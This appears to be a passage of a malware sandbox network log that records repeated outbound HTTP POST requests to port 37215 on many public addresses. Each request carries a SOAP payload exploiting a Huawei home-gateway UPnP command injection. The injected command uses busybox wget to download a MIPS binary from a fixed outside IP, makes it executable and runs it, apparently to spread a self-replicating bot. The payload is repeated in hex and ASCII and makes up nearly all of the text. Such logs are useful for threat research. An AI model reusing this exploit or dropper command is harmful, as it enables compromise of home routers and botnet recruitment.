                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2242192.168.2.234978441.244.168.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664458036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2243192.168.2.2358458197.194.198.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664475918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2244192.168.2.2357600157.226.71.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664479971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2245192.168.2.235555465.195.176.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664503098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2246192.168.2.2355202197.88.227.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664518118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2247192.168.2.233909641.155.103.8337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664644957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2248192.168.2.234657246.191.247.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664654970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2249192.168.2.2353888197.151.134.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664671898 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2250192.168.2.2337652168.235.192.25437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664673090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2251192.168.2.235914441.161.252.1437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664956093 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2252192.168.2.2357718128.75.71.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.664971113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
